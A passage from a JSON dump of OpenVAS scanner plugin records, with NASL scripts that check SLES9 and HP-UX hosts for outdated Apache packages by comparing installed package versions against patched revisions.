5.0}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-2700", "CVE-2006-3918", "CVE-2005-3357"], "modified": "2017-07-11T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=65575", "id": "OPENVAS:65575", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5013454.nasl 6666 2017-07-11 13:13:36Z cfischer $\n# Description: Security update for apache2,apache2-prefork,apache2-worker\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n apache2-worker\n apache2-prefork\n apache2\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5013454 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_id(65575);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2005-3357\", \"CVE-2005-2700\", \"CVE-2006-3918\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES9: Security update for apache2,apache2-prefork,apache2-worker\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"apache2-worker\", rpm:\"apache2-worker~2.0.49~27.59\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:39:21", "references": [], "pluginID": "136141256231065575", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n apache2-worker\n apache2-prefork\n apache2\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5013454 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "edition": 1, "reporter": "Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com", "published": "2009-10-10T00:00:00", "type": "openvas", "title": "SLES9: Security update for apache2,apache2-prefork,apache2-worker", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-2700", "CVE-2006-3918", "CVE-2005-3357"], "modified": "2018-04-06T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065575", "id": "OPENVAS:136141256231065575", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5013454.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Security update for apache2,apache2-prefork,apache2-worker\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n apache2-worker\n apache2-prefork\n apache2\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5013454 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.65575\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2005-3357\", \"CVE-2005-2700\", \"CVE-2006-3918\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES9: Security update for apache2,apache2-prefork,apache2-worker\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"apache2-worker\", rpm:\"apache2-worker~2.0.49~27.59\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:38:14", "references": [], "pluginID": "136141256231065467", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n apache-example-pages\n apache-doc\n apache-devel\n apache\n mod_ssl\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5023075 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "edition": 1, "reporter": "Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com", "published": "2009-10-10T00:00:00", "type": "openvas", "title": "SLES9: Security update for Apache", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3918", "CVE-2008-0005", "CVE-2007-6388", "CVE-2007-5000"], "modified": "2018-04-06T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065467", "id": "OPENVAS:136141256231065467", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5023075.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Security update for Apache\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n apache-example-pages\n apache-doc\n apache-devel\n apache\n mod_ssl\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5023075 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.65467\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2006-3918\", \"CVE-2007-5000\", \"CVE-2007-6388\", \"CVE-2008-0005\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_name(\"SLES9: Security update for Apache\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"apache-example-pages\", rpm:\"apache-example-pages~1.3.29~71.26\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-07-26T08:55:32", "references": [], "pluginID": "65467", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n apache-example-pages\n apache-doc\n apache-devel\n apache\n mod_ssl\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5023075 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "edition": 2, "reporter": "Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com", "published": "2009-10-10T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "SLES9: Security update for Apache", "type": "openvas", "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3918", "CVE-2008-0005", "CVE-2007-6388", "CVE-2007-5000"], "modified": "2017-07-11T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=65467", "id": "OPENVAS:65467", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5023075.nasl 6666 2017-07-11 13:13:36Z cfischer $\n# Description: Security update for Apache\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n apache-example-pages\n apache-doc\n apache-devel\n apache\n mod_ssl\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5023075 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_id(65467);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2006-3918\", \"CVE-2007-5000\", \"CVE-2007-6388\", \"CVE-2008-0005\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_name(\"SLES9: Security update for Apache\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"apache-example-pages\", rpm:\"apache-example-pages~1.3.29~71.26\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-07-24T12:55:52", "references": ["http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c02579879", "02612"], "pluginID": "835247", "description": "Check for the Version of Apache-based Web Server", "edition": 2, "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "published": "2011-01-04T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "HP-UX Update for Apache-based Web Server HPSBUX02612", "type": "openvas", "naslFamily": "HP-UX Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3918", "CVE-2009-1955", "CVE-2007-6203", "CVE-2009-1890", "CVE-2009-0023", "CVE-2010-1452", "CVE-2009-1956", "CVE-2009-1891", "CVE-2009-1195"], "modified": "2017-07-06T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=835247", "id": "OPENVAS:835247", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# HP-UX Update for Apache-based Web Server HPSBUX02612\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_impact = \"Local information disclosure\n increase of privilege\n remote Denial of Service (DoS)\";\ntag_affected = \"Apache-based Web Server on\n HP-UX B.11.11, B.11.23 and B.11.31 running Apache-based Web Server prior to \n v2.0.63.01 HP-UX Apache-based Web Server v2.0.63.01 is contained in HP-UX \n Web Server Suite v.2.32\";\ntag_insight = \"Potential security vulnerabilities have been identified with HP-UX \n Apache-based Web Server. These vulnerabilities could be exploited locally to \n disclose information, increase privilege or remotely create a Denial of \n Service (DoS).\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c02579879\");\n script_id(835247);\n script_version(\"$Revision: 6582 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 16:11:56 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-01-04 15:48:51 +0100 (Tue, 04 Jan 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"HPSBUX\", value: \"02612\");\n script_cve_id(\"CVE-2010-1452\", \"CVE-2009-1956\", \"CVE-2009-1955\", \"CVE-2009-1891\", \"CVE-2009-1890\", \"CVE-2009-1195\", \"CVE-2009-0023\", \"CVE-2007-6203\", \"CVE-2006-3918\");\n script_name(\"HP-UX Update for Apache-based Web Server HPSBUX02612\");\n\n script_summary(\"Check for the Version of Apache-based Web Server\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"HP-UX Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/hp_hp-ux\", \"ssh/login/release\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-hpux.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"HPUX11.31\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.APACHE\", revision:\"B.2.0.63.01\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.APACHE2\", revision:\"B.2.0.63.01\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.AUTH_LDAP\", revision:\"B.2.0.63.01\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.AUTH_LDAP2\", revision:\"B.2.0.63.01\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.MOD_JK\", revision:\"B.2.0.63.01\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.MOD_JK2\", revision:\"B.2.0.63.01\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.MOD_PERL\", revision:\"B.2.0.63.01\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.MOD_PERL2\", revision:\"B.2.0.63.01\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.PHP\", revision:\"B.2.0.63.01\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.PHP2\", revision:\"B.2.0.63.01\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.WEBPROXY\", revision:\"B.2.0.63.01\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.APACHE\", revision:\"B.2.0.63.01\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.APACHE2\", revision:\"B.2.0.63.01\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.AUTH_LDAP\", revision:\"B.2.0.63.01\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.AUTH_LDAP2\", revision:\"B.2.0.63.01\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.MOD_JK\", revision:\"B.2.0.63.01\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.MOD_JK2\", revision:\"B.2.0.63.01\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.MOD_PERL\", revision:\"B.2.0.63.01\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.MOD_PERL2\", revision:\"B.2.0.63.01\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.PHP\", revision:\"B.2.0.63.01\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.PHP2\", revision:\"B.2.0.63.01\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.WEBPROXY\", revision:\"B.2.0.63.01\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.23\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.APACHE\", revision:\"B.2.0.63.01\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.APACHE2\", revision:\"B.2.0.63.01\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.AUTH_LDAP\", revision:\"B.2.0.63.01\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.AUTH_LDAP2\", revision:\"B.2.0.63.01\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.MOD_JK\", revision:\"B.2.0.63.01\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.MOD_JK2\", revision:\"B.2.0.63.01\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.MOD_PERL\", revision:\"B.2.0.63.01\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.MOD_PERL2\", revision:\"B.2.0.63.01\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.PHP\", revision:\"B.2.0.63.01\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.PHP2\", revision:\"B.2.0.63.01\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPCH32.WEBPROXY\", revision:\"B.2.0.63.01\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.APACHE\", revision:\"B.2.0.63.01\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.APACHE2\", revision:\"B.2.0.63.01\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.AUTH_LDAP\", revision:\"B.2.0.63.01\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.AUTH_LDAP2\", revision:\"B.2.0.63.01\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.MOD_JK\", revision:\"B.2.0.63.01\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.MOD_JK2\", revision:\"B.2.0.63.01\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.MOD_PERL\", revision:\"B.2.0.63.01\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.MOD_PERL2\", revision:\"B.2.0.63.01\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.PHP\", revision:\"B.2.0.63.01\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.PHP2\", revision:\"B.2.0.63.01\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.WEBPROXY\", revision:\"B.2.0.63.01\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.11\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.APACHE\", revision:\"B.2.0.63.01\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.APACHE2\", revision:\"B.2.0.63.01\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.AUTH_LDAP\", revision:\"B.2.0.63.01\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 